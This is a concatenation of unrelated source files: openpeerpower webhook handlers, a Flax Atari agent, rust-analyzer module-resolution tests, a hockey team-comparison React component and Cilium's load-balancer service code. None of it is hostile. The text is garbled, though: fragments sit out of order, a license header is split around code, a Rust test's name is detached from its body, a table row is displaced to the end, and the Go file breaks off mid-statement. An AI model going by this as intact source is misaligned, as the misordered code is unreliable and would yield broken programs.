async_dispatcher_send(opp, register_signal, data) return webhook_response( {"success": True}, registration=config_entry.data, status=HTTP_CREATED, ) @WEBHOOK_COMMANDS.register("update_sensor_states") @validate_schema( vol.All( cv.ensure_list, [ vol.Schema( { vol.Optional(ATTR_SENSOR_ATTRIBUTES, default={}): dict, vol.Optional(ATTR_SENSOR_ICON, default="mdi:cellphone"): cv.icon, vol.Required(ATTR_SENSOR_STATE): vol.Any(bool, str, int, float), vol.Required(ATTR_SENSOR_TYPE): vol.In(SENSOR_TYPES), vol.Required(ATTR_SENSOR_UNIQUE_ID): cv.string, } ) ], ) ) async def webhook_update_sensor_states(opp, config_entry, data): """Handle an update sensor states webhook.""" resp = {} for sensor in data: entity_type = sensor[ATTR_SENSOR_TYPE] unique_id = sensor[ATTR_SENSOR_UNIQUE_ID] unique_store_key = f"{config_entry.data[CONF_WEBHOOK_ID]}_{unique_id}" if unique_store_key not in opp.data[DOMAIN][entity_type]: _LOGGER.error( "Refusing to update non-registered sensor: %s", unique_store_key ) err_msg = f"{entity_type} {unique_id} is not registered" resp[unique_id] = { "success": False, "error": {"code": ERR_SENSOR_NOT_REGISTERED, "message": err_msg}, } continue entry = opp.data[DOMAIN][entity_type][unique_store_key] new_state = {**entry, **sensor} opp.data[DOMAIN][entity_type][unique_store_key] = new_state safe = savable_state(opp) try: await opp.data[DOMAIN][DATA_STORE].async_save(safe) except OpenPeerPowerError as ex: _LOGGER.error("Error updating mobile_app registration: %s", ex) return empty_okay_response() async_dispatcher_send(opp, SIGNAL_SENSOR_UPDATE, new_state) resp[unique_id] = {"success": True} return webhook_response(resp, registration=config_entry.data) @WEBHOOK_COMMANDS.register("get_zones") async def webhook_get_zones(opp, config_entry, data): """Handle a get zones webhook.""" zones = [ opp.states.get(entity_id) for entity_id in sorted(opp.states.async_entity_ids(ZONE_DOMAIN)) ] return webhook_response(zones, registration=config_entry.data) @WEBHOOK_COMMANDS.register("get_config") async def webhook_get_config(opp, config_entry, data): """Handle a get config webhook.""" opp_config = opp.config.as_dict() resp = { "latitude": opp_config["latitude"], "longitude": opp_config["longitude"], "elevation": opp_config["elevation"], "unit_system": opp_config["unit_system"], "location_name": opp_config["location_name"], "time_zone": opp_config["time_zone"], "components": opp_config["components"], "version": opp_config["version"], "theme_color": MANIFEST_JSON["theme_color"], } if CONF_CLOUDHOOK_URL in config_entry.data: resp[CONF_CLOUDHOOK_URL] = config_entry.data[CONF_CLOUDHOOK_URL] try: resp[CONF_REMOTE_UI_URL] = opp.components.cloud.async_remote_ui_url() except opp.components.cloud.CloudNotAvailable: pass return webhook_response(resp, registration=config_entry.data)
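The webhook handlers above are all dispatched through a Registry keyed by the payload's webhook type, with each handler wrapped by a schema-validating decorator. A minimal standalone sketch of that dispatch pattern, using a plain dict and hand-rolled validation instead of openpeerpower's Registry and voluptuous (COMMANDS, register, and the sample handler are illustrative names, not part of the source):

from functools import wraps

COMMANDS = {}  # maps a webhook type to its handler, like WEBHOOK_COMMANDS above


def register(name):
    """Register a handler under a webhook type (stand-in for Registry)."""
    def decorator(func):
        COMMANDS[name] = func
        return func
    return decorator


def validate_schema(schema):
    """Wrap a handler so its payload is validated first; bad payloads are
    acknowledged but ignored, mirroring empty_okay_response()."""
    def wrapper(func):
        @wraps(func)
        def validate_and_run(data):
            try:
                data = schema(data)
            except (KeyError, ValueError) as err:
                return {"ok": True, "ignored": repr(err)}
            return func(data)
        return validate_and_run
    return wrapper


@register("fire_event")
@validate_schema(lambda d: {"event_type": str(d["event_type"])})
def fire_event(data):
    return {"fired": data["event_type"]}


def handle_webhook(payload):
    """Route a decoded payload to the handler registered for its type."""
    handler = COMMANDS.get(payload.get("type"))
    if handler is None:
        return {"ok": True, "ignored": "unknown webhook type"}
    return handler(payload.get("data", {}))


print(handle_webhook({"type": "fire_event", "data": {"event_type": "test"}}))
# -> {'fired': 'test'}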
agent.py
# Copyright 2021 The Flax Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and
import functools import multiprocessing import collections from typing import Any, Callable import numpy as np import jax import flax import env_utils @functools.partial(jax.jit, static_argnums=0) def policy_action( apply_fn: Callable[..., Any], params: flax.core.frozen_dict.FrozenDict, state: np.ndarray): """Forward pass of the network. Args: params: the parameters of the actor-critic model module: the actor-critic model state: the input for the forward pass Returns: out: a tuple (log_probabilities, values) """ out = apply_fn({'params': params}, state) return out ExpTuple = collections.namedtuple( 'ExpTuple', ['state', 'action', 'reward', 'value', 'log_prob', 'done']) class RemoteSimulator: """Wrap functionality for an agent emulating Atari in a separate process. An object of this class is created for every agent. """ def __init__(self, game: str): """Start the remote process and create Pipe() to communicate with it.""" parent_conn, child_conn = multiprocessing.Pipe() self.proc = multiprocessing.Process( target=rcv_action_send_exp, args=(child_conn, game)) self.proc.daemon = True self.conn = parent_conn self.proc.start() def rcv_action_send_exp(conn, game: str): """Run the remote agents. Receive action from the main learner, perform one step of simulation and send back collected experience. """ env = env_utils.create_env(game, clip_rewards=True) while True: obs = env.reset() done = False # Observations fetched from Atari env need additional batch dimension. state = obs[None, ...] while not done: conn.send(state) action = conn.recv() obs, reward, done, _ = env.step(action) next_state = obs[None, ...] if not done else None experience = (state, action, reward, done) conn.send(experience) if done: break state = next_state
# limitations under the License. """Agent utilities, incl. choosing the move and running in separate process."""
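RemoteSimulator above talks to its child process over a multiprocessing.Pipe: the child repeatedly sends the current state, waits for an action, and then sends back an experience tuple. A self-contained sketch of that request/response loop with a trivial counting environment standing in for Atari (worker and the reward rule are invented for illustration):

# Standalone sketch of the Pipe-based simulator loop used by RemoteSimulator.
import multiprocessing


def worker(conn, episode_len=3):
    state = 0
    for _ in range(episode_len):
        conn.send(state)                # ask the learner for an action
        action = conn.recv()            # block until the action arrives
        reward = float(action == 1)     # dummy reward rule
        done = state == episode_len - 1
        conn.send((state, action, reward, done))  # experience tuple
        state += 1
    conn.close()


if __name__ == "__main__":
    parent, child = multiprocessing.Pipe()
    proc = multiprocessing.Process(target=worker, args=(child,))
    proc.daemon = True
    proc.start()
    for _ in range(3):
        state = parent.recv()           # receive state, pick an action, send it
        parent.send(1)
        print("experience:", parent.recv())
    proc.join()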
mod_resolution.rs
use super::*; #[test] fn name_res_works_for_broken_modules() { cov_mark::check!(name_res_works_for_broken_modules); check( r" //- /lib.rs mod foo // no `;`, no body use self::foo::Baz; //- /foo/mod.rs pub mod bar; pub use self::bar::Baz; //- /foo/bar.rs pub struct Baz; ", expect![[r#" crate Baz: _ foo: t crate::foo "#]], ); } #[test] fn nested_module_resolution() { check( r#" //- /lib.rs mod n1; //- /n1.rs mod n2; //- /n1/n2.rs struct X; "#, expect![[r#" crate n1: t crate::n1 n2: t crate::n1::n2 X: t v "#]], ); } #[test] fn nested_module_resolution_2() { check( r#" //- /lib.rs mod prelude; mod iter; //- /prelude.rs pub use crate::iter::Iterator; //- /iter.rs pub use self::traits::Iterator; mod traits; //- /iter/traits.rs pub use self::iterator::Iterator; mod iterator; //- /iter/traits/iterator.rs pub trait Iterator; "#, expect![[r#" crate iter: t prelude: t crate::iter Iterator: t traits: t crate::iter::traits Iterator: t iterator: t crate::iter::traits::iterator Iterator: t crate::prelude Iterator: t "#]], ); } #[test] fn module_resolution_works_for_non_standard_filenames() { check( r#" //- /my_library.rs crate:my_library mod foo; use self::foo::Bar; //- /foo/mod.rs pub struct Bar; "#, expect![[r#" crate Bar: t v foo: t crate::foo Bar: t v "#]], ); } #[test] fn module_resolution_works_for_raw_modules() { check( r#" //- /lib.rs mod r#async; use self::r#async::Bar; //- /async.rs pub struct Bar; "#, expect![[r#" crate Bar: t v async: t crate::async Bar: t v "#]], ); } #[test] fn module_resolution_decl_path() { check( r#" //- /lib.rs #[path = "bar/baz/foo.rs"] mod foo; use self::foo::Bar; //- /bar/baz/foo.rs pub struct Bar; "#, expect![[r#" crate Bar: t v foo: t crate::foo Bar: t v "#]], ); } #[test] fn module_resolution_module_with_path_in_mod_rs() { check( r#" //- /main.rs mod foo; //- /foo/mod.rs #[path = "baz.rs"] pub mod bar; use self::bar::Baz; //- /foo/baz.rs pub struct Baz; "#, expect![[r#" crate foo: t crate::foo Baz: t v bar: t crate::foo::bar Baz: t v "#]], ); } #[test] fn module_resolution_module_with_path_non_crate_root() { check( r#" //- /main.rs mod foo; //- /foo.rs #[path = "baz.rs"] pub mod bar; use self::bar::Baz; //- /baz.rs pub struct Baz; "#, expect![[r#" crate foo: t crate::foo Baz: t v bar: t crate::foo::bar Baz: t v "#]], ); } #[test] fn module_resolution_module_decl_path_super() { check( r#" //- /main.rs #[path = "bar/baz/module.rs"] mod foo; pub struct Baz; //- /bar/baz/module.rs use super::Baz; "#, expect![[r#" crate Baz: t v foo: t crate::foo Baz: t v "#]], ); } #[test] fn module_resolution_explicit_path_mod_rs() { check( r#" //- /main.rs #[path = "module/mod.rs"] mod foo; //- /module/mod.rs pub struct Baz; "#, expect![[r#" crate foo: t crate::foo Baz: t v "#]], ); } #[test] fn module_resolution_relative_path() { check( r#" //- /main.rs mod foo; //- /foo.rs #[path = "./sub.rs"] pub mod foo_bar; //- /sub.rs pub struct Baz; "#, expect![[r#" crate foo: t crate::foo foo_bar: t crate::foo::foo_bar Baz: t v "#]], ); } #[test] fn module_resolution_relative_path_2() { check( r#" //- /main.rs mod foo; //- /foo/mod.rs #[path="../sub.rs"] pub mod foo_bar; //- /sub.rs pub struct Baz; "#, expect![[r#" crate foo: t crate::foo foo_bar: t crate::foo::foo_bar Baz: t v "#]], ); } #[test] fn module_resolution_relative_path_outside_root() { check( r#" //- /a/b/c/d/e/main.rs crate:main #[path="../../../../../outside.rs"] mod foo; //- /outside.rs mod bar; //- /bar.rs pub struct Baz; "#, expect![[r#" crate foo: t crate::foo bar: t crate::foo::bar Baz: t v "#]], ); } #[test] fn 
module_resolution_explicit_path_mod_rs_2() { check( r#" //- /main.rs #[path = "module/bar/mod.rs"] mod foo; //- /module/bar/mod.rs pub struct Baz; "#, expect![[r#" crate foo: t crate::foo Baz: t v "#]], ); } #[test] fn module_resolution_explicit_path_mod_rs_with_win_separator() { check( r#" //- /main.rs #[path = r"module\bar\mod.rs"] mod foo; //- /module/bar/mod.rs pub struct Baz; "#, expect![[r#" crate foo: t crate::foo Baz: t v "#]], ); } #[test] fn module_resolution_decl_inside_inline_module_with_path_attribute() { check( r#" //- /main.rs #[path = "models"] mod foo { mod bar; } //- /models/bar.rs pub struct Baz; "#, expect![[r#" crate foo: t crate::foo bar: t crate::foo::bar Baz: t v "#]], ); } #[test] fn module_resolution_decl_inside_inline_module() { check( r#" //- /main.rs mod foo { mod bar; } //- /foo/bar.rs pub struct Baz; "#, expect![[r#" crate foo: t crate::foo bar: t crate::foo::bar Baz: t v "#]], ); } #[test] fn module_resolution_decl_inside_inline_module_2_with_path_attribute() { check( r#" //- /main.rs #[path = "models/db"] mod foo { mod bar; } //- /models/db/bar.rs pub struct Baz; "#, expect![[r#" crate foo: t crate::foo bar: t crate::foo::bar Baz: t v "#]], ); } #[test] fn module_resolution_decl_inside_inline_module_3() { check( r#" //- /main.rs #[path = "models/db"] mod foo { #[path = "users.rs"] mod bar; } //- /models/db/users.rs pub struct Baz; "#, expect![[r#" crate foo: t crate::foo bar: t crate::foo::bar Baz: t v "#]], ); } #[test] fn module_resolution_decl_inside_inline_module_empty_path() { check( r#" //- /main.rs #[path = ""] mod foo { #[path = "users.rs"] mod bar; } //- /users.rs pub struct Baz; "#, expect![[r#" crate foo: t crate::foo bar: t crate::foo::bar Baz: t v "#]], ); } #[test] fn module_resolution_decl_empty_path() { check( r#" //- /main.rs #[path = ""] // Should try to read `/` (a directory) mod foo; //- /foo.rs pub struct Baz; "#, expect![[r#" crate foo: t crate::foo "#]], ); } #[test] fn module_resolution_decl_inside_inline_module_relative_path() { check( r#" //- /main.rs #[path = "./models"] mod foo { mod bar; } //- /models/bar.rs pub struct Baz; "#, expect![[r#" crate foo: t crate::foo bar: t crate::foo::bar Baz: t v "#]], ); } #[test] fn module_resolution_decl_inside_inline_module_in_crate_root() { check( r#" //- /main.rs mod foo { #[path = "baz.rs"] mod bar; } use self::foo::bar::Baz; //- /foo/baz.rs pub struct Baz; "#, expect![[r#" crate Baz: t v foo: t crate::foo bar: t crate::foo::bar Baz: t v "#]], ); } #[test] fn module_resolution_decl_inside_inline_module_in_mod_rs() { check( r#" //- /main.rs mod foo; //- /foo/mod.rs mod bar { #[path = "qwe.rs"] pub mod baz; } use self::bar::baz::Baz; //- /foo/bar/qwe.rs pub struct Baz; "#, expect![[r#" crate foo: t crate::foo Baz: t v bar: t crate::foo::bar baz: t crate::foo::bar::baz Baz: t v "#]], ); } #[test] fn module_resolution_decl_inside_inline_module_in_non_crate_root() { check( r#" //- /main.rs mod foo; //- /foo.rs mod bar { #[path = "qwe.rs"] pub mod baz; } use self::bar::baz::Baz; //- /foo/bar/qwe.rs pub struct Baz; "#, expect![[r#" crate foo: t crate::foo Baz: t v bar: t crate::foo::bar baz: t crate::foo::bar::baz Baz: t v "#]], ); } #[test] fn module_resolution_decl_inside_inline_module_in_non_crate_root_2() { check( r#" //- /main.rs mod foo; //- /foo.rs #[path = "bar"] mod bar { pub mod baz; } use self::bar::baz::Baz; //- /bar/baz.rs pub struct Baz; "#, expect![[r#" crate foo: t crate::foo Baz: t v bar: t crate::foo::bar baz: t crate::foo::bar::baz Baz: t v "#]], ); } #[test] fn
() { check( r#" //- /main.rs #[path="module/m2.rs"] mod module; //- /module/m2.rs pub mod submod; //- /module/submod.rs pub struct Baz; "#, expect![[r#" crate module: t crate::module submod: t crate::module::submod Baz: t v "#]], ); } #[test] fn nested_out_of_line_module() { check( r#" //- /lib.rs mod a { mod b { mod c; } } //- /a/b/c.rs struct X; "#, expect![[r#" crate a: t crate::a b: t crate::a::b c: t crate::a::b::c X: t v "#]], ); } #[test] fn nested_out_of_line_module_with_path() { check( r#" //- /lib.rs mod a { #[path = "d/e"] mod b { mod c; } } //- /a/d/e/c.rs struct X; "#, expect![[r#" crate a: t crate::a b: t crate::a::b c: t crate::a::b::c X: t v "#]], ); } #[test] fn circular_mods() { cov_mark::check!(circular_mods); compute_crate_def_map( r#" //- /lib.rs mod foo; //- /foo.rs #[path = "./foo.rs"] mod foo; "#, ); compute_crate_def_map( r#" //- /lib.rs mod foo; //- /foo.rs #[path = "./bar.rs"] mod bar; //- /bar.rs #[path = "./foo.rs"] mod foo; "#, ); } #[test] fn abs_path_ignores_local() { check( r#" //- /main.rs crate:main deps:core pub use ::core::hash::Hash; pub mod core {} //- /lib.rs crate:core pub mod hash { pub trait Hash {} } "#, expect![[r#" crate Hash: t core: t crate::core "#]], ); } #[test] fn cfg_in_module_file() { // Inner `#![cfg]` in a module file makes the whole module disappear. check( r#" //- /main.rs mod module; //- /module.rs #![cfg(NEVER)] struct AlsoShoulntAppear; "#, expect![[r#" crate "#]], ) }
module_resolution_decl_inside_module_in_non_crate_root_2
Compare.tsx
import * as React from 'react'; import { TeamLogo } from '../../../../hockey/TeamLogo' type Props = { //@TODO all english, and color logic homeplatz: number, awayplatz: number, homepunkte: number, awaypunkte: number, hometore: number, homegegentore: number, awaytore: number, awaygegentore: number, homescorer: string, homescorerpunkte: number, awayscorer: string, awayscorerpunkte: number homegefahr: string, homegefahrpunkte: number, awaygefahr: string, awaygefahrpunkte: number, homebadboy: string, homebadboypunkte: number, awaybadboy: string, awaybadboypunkte: number, hometeam: Club, awayteam: Club } class Compare extends React.Component<Props> { getColor(a: number, b: number, inverse = false): string { let isBetterA = (a >= b); if (inverse) isBetterA = !isBetterA; return isBetterA ? 'green' : 'red'; } render() { return ( <section className="screen-compare present" data-fullscreen=""> <div className="bg-green-light screen-title"><h4>Teamvergleich</h4></div> <table> <tbody> <tr> <td align="right"><span className={`bg-${ this.getColor(this.props.homeplatz, this.props.awayplatz, true) }-light`}>{ this.props.homeplatz }</span></td> <td className="middle" align="center">Tabellenplatz</td> <td><span className={`bg-${ this.getColor(this.props.awayplatz, this.props.homeplatz, true) }-light`}>{ this.props.awayplatz }</span></td> </tr> <tr> <td align="right"><span className={`bg-${ this.getColor(this.props.homepunkte, this.props.awaypunkte) }-light`}>{ this.props.homepunkte }</span></td> <td className="middle" align="center">Punkte</td> <td><span className={`bg-${ this.getColor(this.props.awaypunkte, this.props.homepunkte) }-light`}>{ this.props.awaypunkte }</span></td> </tr> <tr> <td align="right"><span className={`bg-${ this.getColor(this.props.hometore - this.props.homegegentore, this.props.awaytore - this.props.awaygegentore) }-light`}>{ this.props.hometore }:{ this.props.homegegentore }</span></td>
<tr> <td align="right"><span className={`bg-${ this.getColor(this.props.homescorerpunkte, this.props.awayscorerpunkte) }-light`}>{ this.props.homescorer }&nbsp;({ this.props.homescorerpunkte } Punkte)</span></td> <td className="middle" align="center">Topscorer</td> <td><span className={`bg-${ this.getColor(this.props.awayscorerpunkte, this.props.homescorerpunkte) }-light`}>{ this.props.awayscorer }&nbsp;({ this.props.awayscorerpunkte } Punkte)</span></td> </tr> <tr> <td align="right"><span className={`bg-${ this.getColor(this.props.homegefahrpunkte, this.props.awaygefahrpunkte) }-light`}>{ this.props.homegefahr }&nbsp;({ this.props.homegefahrpunkte } Tore)</span></td> <td className="middle" align="center">Gefährlich</td> <td><span className={`bg-${ this.getColor(this.props.awaygefahrpunkte, this.props.homegefahrpunkte) }-light`}>{ this.props.awaygefahr }&nbsp;({ this.props.awaygefahrpunkte } Tore)</span></td> </tr> <tr> <td align="right"><span className={`bg-${ this.getColor(this.props.homebadboypunkte, this.props.awaybadboypunkte) }-light`}>{ this.props.homebadboy }&nbsp;({ this.props.homebadboypunkte } Minuten)</span></td> <td className="middle" align="center">Bad Boy</td> <td><span className={`bg-${ this.getColor(this.props.awaybadboypunkte, this.props.homebadboypunkte) }-light`}>{ this.props.awaybadboy }&nbsp;({ this.props.awaybadboypunkte } Minuten)</span></td> </tr> <tr> <td align="right"> <TeamLogo logo={this.props.hometeam.logo} alt={this.props.hometeam.name} width={100} height={100}/> </td> <td>&nbsp;</td> <td> <TeamLogo logo={this.props.awayteam.logo} alt={this.props.awayteam.name} width={100} height={100}/> </td> </tr> </tbody> </table> </section> ) } } export { Compare }
<td className="middle" align="center">Tore</td> <td><span className={`bg-${ this.getColor(this.props.awaytore - this.props.awaygegentore, this.props.hometore - this.props.homegegentore) }-light`}>{ this.props.awaytore }:{ this.props.awaygegentore}</span></td> </tr>
service.go
// Copyright 2019 Authors of Cilium // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. package service import ( "fmt" "net" "github.com/cilium/cilium/pkg/bpf" "github.com/cilium/cilium/pkg/counter" lb "github.com/cilium/cilium/pkg/loadbalancer" "github.com/cilium/cilium/pkg/lock" "github.com/cilium/cilium/pkg/logging/logfields" "github.com/cilium/cilium/pkg/maps/lbmap" "github.com/cilium/cilium/pkg/metrics" "github.com/sirupsen/logrus" ) var ( updateMetric = metrics.ServicesCount.WithLabelValues("update") deleteMetric = metrics.ServicesCount.WithLabelValues("delete") addMetric = metrics.ServicesCount.WithLabelValues("add") ) // LBMap is the interface describing methods for manipulating service maps. type LBMap interface { UpsertService(uint16, net.IP, uint16, []uint16, int, bool) error DeleteService(lb.L3n4AddrID, int) error AddBackend(uint16, net.IP, uint16, bool) error DeleteBackendByID(uint16, bool) error DumpServiceMaps() ([]*lb.SVC, []error) DumpBackendMaps() ([]*lb.Backend, error) } type svcInfo struct { hash string frontend lb.L3n4AddrID backends []lb.Backend backendByHash map[string]*lb.Backend svcType lb.SVCType svcName string svcNamespace string restoredFromDatapath bool } func (svc *svcInfo) deepCopyToLBSVC() *lb.SVC { backends := make([]lb.Backend, len(svc.backends)) for i, backend := range svc.backends { backends[i] = *backend.DeepCopy() } return &lb.SVC{ Frontend: *svc.frontend.DeepCopy(), Backends: backends, Type: svc.svcType, Name: svc.svcName, Namespace: svc.svcNamespace, } } // Service is a service handler. Its main responsibility is to reflect // service-related changes into BPF maps used by datapath BPF programs. // The changes can be triggered either by k8s_watcher or directly by // API calls to the /services endpoint. type Service struct { lock.RWMutex svcByHash map[string]*svcInfo svcByID map[lb.ID]*svcInfo backendRefCount counter.StringCounter backendByHash map[string]*lb.Backend lbmap LBMap } // NewService creates a new instance of the service handler. func NewService() *Service { return &Service{ svcByHash: map[string]*svcInfo{}, svcByID: map[lb.ID]*svcInfo{}, backendRefCount: counter.StringCounter{}, backendByHash: map[string]*lb.Backend{}, lbmap: &lbmap.LBBPFMap{}, } } // InitMaps opens or creates BPF maps used by services. // // If restore is set to false, entries of the maps are removed. func (s *Service) InitMaps(ipv6, ipv4, restore bool) error { s.Lock() defer s.Unlock() // The following two calls can be removed in v1.8+. if err := bpf.UnpinMapIfExists("cilium_lb6_rr_seq_v2"); err != nil { return nil } if err := bpf.UnpinMapIfExists("cilium_lb4_rr_seq_v2"); err != nil { return nil } toOpen := []*bpf.Map{} toDelete := []*bpf.Map{} if ipv6 { toOpen = append(toOpen, lbmap.Service6MapV2, lbmap.Backend6Map, lbmap.RevNat6Map) if !restore { toDelete = append(toDelete, lbmap.Service6MapV2, lbmap.Backend6Map, lbmap.RevNat6Map) } } if ipv4
for _, m := range toOpen { if _, err := m.OpenOrCreate(); err != nil { return err } } for _, m := range toDelete { if err := m.DeleteAll(); err != nil { return err } } return nil } // UpsertService inserts or updates the given service. // // The first return value is true if the service hasn't existed before. func (s *Service) UpsertService( frontend lb.L3n4AddrID, backends []lb.Backend, svcType lb.SVCType, svcName, svcNamespace string) (bool, lb.ID, error) { s.Lock() defer s.Unlock() scopedLog := log.WithFields(logrus.Fields{ logfields.ServiceIP: frontend.L3n4Addr, logfields.Backends: backends, logfields.ServiceType: svcType, logfields.ServiceName: svcName, logfields.ServiceNamespace: svcNamespace, }) scopedLog.Debug("Upserting service") // If needed, create svcInfo and allocate service ID svc, new, err := s.createSVCInfoIfNotExist(frontend, svcType, svcName, svcNamespace) if err != nil { return false, lb.ID(0), err } // TODO(brb) defer ServiceID release after we have a lbmap "rollback" scopedLog = scopedLog.WithField(logfields.ServiceID, svc.frontend.ID) scopedLog.Debug("Acquired service ID") prevBackendCount := len(svc.backends) backendsCopy := []lb.Backend{} for _, b := range backends { backendsCopy = append(backendsCopy, *b.DeepCopy()) } // Update backends cache and allocate/release backend IDs newBackends, obsoleteBackendIDs, err := s.updateBackendsCacheLocked(svc, backendsCopy) if err != nil { return false, lb.ID(0), err } // Update lbmaps (BPF service maps) if err = s.upsertServiceIntoLBMaps(svc, prevBackendCount, newBackends, obsoleteBackendIDs, scopedLog); err != nil { return false, lb.ID(0), err } if new { addMetric.Inc() } else { updateMetric.Inc() } return new, lb.ID(svc.frontend.ID), nil } // DeleteServiceByID removes a service identified by the given ID. func (s *Service) DeleteServiceByID(id lb.ServiceID) (bool, error) { s.Lock() defer s.Unlock() if svc, found := s.svcByID[lb.ID(id)]; found { return true, s.deleteServiceLocked(svc) } return false, nil } // DeleteService removes the given service. func (s *Service) DeleteService(frontend lb.L3n4Addr) (bool, error) { s.Lock() defer s.Unlock() if svc, found := s.svcByHash[frontend.Hash()]; found { return true, s.deleteServiceLocked(svc) } return false, nil } // GetDeepCopyServiceByID returns a deep-copy of a service identified with // the given ID. // // If a service cannot be found, returns false. func (s *Service) GetDeepCopyServiceByID(id lb.ServiceID) (*lb.SVC, bool) { s.RLock() defer s.RUnlock() svc, found := s.svcByID[lb.ID(id)] if !found { return nil, false } return svc.deepCopyToLBSVC(), true } // GetDeepCopyServices returns a deep-copy of all installed services. func (s *Service) GetDeepCopyServices() []*lb.SVC { s.RLock() defer s.RUnlock() svcs := make([]*lb.SVC, 0, len(s.svcByHash)) for _, svc := range s.svcByHash { svcs = append(svcs, svc.deepCopyToLBSVC()) } return svcs } // RestoreServices restores services from BPF maps. // // The method should be called once before establishing a connectivity // to kube-apiserver. 
func (s *Service) RestoreServices() error { s.Lock() defer s.Unlock() // Restore backend IDs if err := s.restoreBackendsLocked(); err != nil { return err } // Restore service cache from BPF maps if err := s.restoreServicesLocked(); err != nil { return err } // Remove obsolete backends and release their IDs if err := s.deleteOrphanBackends(); err != nil { log.WithError(err).Warn("Failed to remove orphan backends") } return nil } // SyncWithK8sFinished removes services which we haven't heard about during // a sync period of cilium-agent's k8s service cache. // // The removal is based on an assumption that during the sync period // UpsertService() is going to be called for each alive service. func (s *Service) SyncWithK8sFinished() error { s.Lock() defer s.Unlock() for _, svc := range s.svcByHash { if svc.restoredFromDatapath { log.WithFields(logrus.Fields{ logfields.ServiceID: svc.frontend.ID, logfields.L3n4Addr: logfields.Repr(svc.frontend.L3n4Addr)}). Warn("Deleting no longer present service") if err := s.deleteServiceLocked(svc); err != nil { return fmt.Errorf("Unable to remove service %+v: %s", svc, err) } } } return nil } func (s *Service) createSVCInfoIfNotExist(frontend lb.L3n4AddrID, svcType lb.SVCType, svcName, svcNamespace string) (*svcInfo, bool, error) { hash := frontend.Hash() svc, found := s.svcByHash[hash] if !found { // Allocate service ID for the new service addrID, err := AcquireID(frontend.L3n4Addr, uint32(frontend.ID)) if err != nil { return nil, false, fmt.Errorf("Unable to allocate service ID %d for %q: %s", frontend.ID, frontend, err) } frontend.ID = addrID.ID svc = &svcInfo{ hash: hash, frontend: frontend, backendByHash: map[string]*lb.Backend{}, svcType: svcType, svcName: svcName, svcNamespace: svcNamespace, } s.svcByID[frontend.ID] = svc s.svcByHash[hash] = svc } else { // NOTE: We cannot restore svcType from BPF maps, so just set it // each time (safe until GH#8700 has been fixed). svc.svcType = svcType // Name and namespace are both optional and intended for exposure via // API. They they are not part of any BPF maps and cannot be restored // from datapath. if svcName != "" { svc.svcName = svcName } if svcNamespace != "" { svc.svcNamespace = svcNamespace } // We have heard about the service from k8s, so unset the flag so that // SyncWithK8sFinished() won't consider the service obsolete, and thus // won't remove it. svc.restoredFromDatapath = false } return svc, !found, nil } func (s *Service) upsertServiceIntoLBMaps(svc *svcInfo, prevBackendCount int, newBackends []lb.Backend, obsoleteBackendIDs []lb.BackendID, scopedLog *logrus.Entry) error { ipv6 := svc.frontend.IsIPv6() // Add new backends into BPF maps for _, b := range newBackends { scopedLog.WithFields(logrus.Fields{ logfields.BackendID: b.ID, logfields.L3n4Addr: b.L3n4Addr, }).Debug("Adding new backend") if err := s.lbmap.AddBackend(uint16(b.ID), b.L3n4Addr.IP, b.L3n4Addr.L4Addr.Port, ipv6); err != nil { return err } } // Upsert service entries into BPF maps backendIDs := make([]uint16, len(svc.backends)) for i, b := range svc.backends { backendIDs[i] = uint16(b.ID) } err := s.lbmap.UpsertService( uint16(svc.frontend.ID), svc.frontend.L3n4Addr.IP, svc.frontend.L3n4Addr.L4Addr.Port, backendIDs, prevBackendCount, ipv6) if err != nil { return err } // Remove backends not used by any service from BPF maps for _, id := range obsoleteBackendIDs { scopedLog.WithField(logfields.BackendID, id). 
Debug("Removing obsolete backend") if err := s.lbmap.DeleteBackendByID(uint16(id), ipv6); err != nil { log.WithError(err).WithField(logfields.BackendID, id). Warn("Failed to remove backend from maps") } } return nil } func (s *Service) restoreBackendsLocked() error { backends, err := s.lbmap.DumpBackendMaps() if err != nil { return fmt.Errorf("Unable to dump backend maps: %s", err) } for _, b := range backends { log.WithFields(logrus.Fields{ logfields.BackendID: b.ID, logfields.L3n4Addr: b.L3n4Addr.String(), }).Debug("Restoring backend") if err := RestoreBackendID(b.L3n4Addr, b.ID); err != nil { return fmt.Errorf("Unable to restore backend ID %d for %q: %s", b.ID, b.L3n4Addr, err) } hash := b.L3n4Addr.Hash() s.backendByHash[hash] = b } return nil } func (s *Service) deleteOrphanBackends() error { for hash, b := range s.backendByHash { if s.backendRefCount[hash] == 0 { log.WithField(logfields.BackendID, b.ID). Debug("Removing orphan backend") DeleteBackendID(b.ID) if err := s.lbmap.DeleteBackendByID(uint16(b.ID), b.L3n4Addr.IsIPv6()); err != nil { return fmt.Errorf("Unable to remove backend %d from map: %s", b.ID, err) } delete(s.backendByHash, hash) } } return nil } func (s *Service) restoreServicesLocked() error { failed, restored := 0, 0 svcs, errors := s.lbmap.DumpServiceMaps() for _, err := range errors { log.WithError(err).Warning("Error occurred while dumping service maps") } for _, svc := range svcs { scopedLog := log.WithFields(logrus.Fields{ logfields.ServiceID: svc.Frontend.ID, logfields.ServiceIP: svc.Frontend.L3n4Addr.String(), }) scopedLog.Debug("Restoring service") if _, err := RestoreID(svc.Frontend.L3n4Addr, uint32(svc.Frontend.ID)); err != nil { failed++ scopedLog.WithError(err).Warning("Unable to restore service ID") } newSVC := &svcInfo{ hash: svc.Frontend.Hash(), frontend: svc.Frontend, backends: svc.Backends, backendByHash: map[string]*lb.Backend{}, // Correct service type will be restored by k8s_watcher after k8s // service cache has been initialized svcType: lb.SVCTypeClusterIP, // Indicate that the svc was restored from the BPF maps, so that // SyncWithK8sFinished() could remove services which were restored // from the maps but not present in the k8sServiceCache (e.g. a svc // was deleted while cilium-agent was down). restoredFromDatapath: true, } for j, backend := range svc.Backends { hash := backend.L3n4Addr.Hash() s.backendRefCount.Add(hash) newSVC.backendByHash[hash] = &svc.Backends[j] } s.svcByHash[newSVC.hash] = newSVC s.svcByID[newSVC.frontend.ID] = newSVC restored++ } 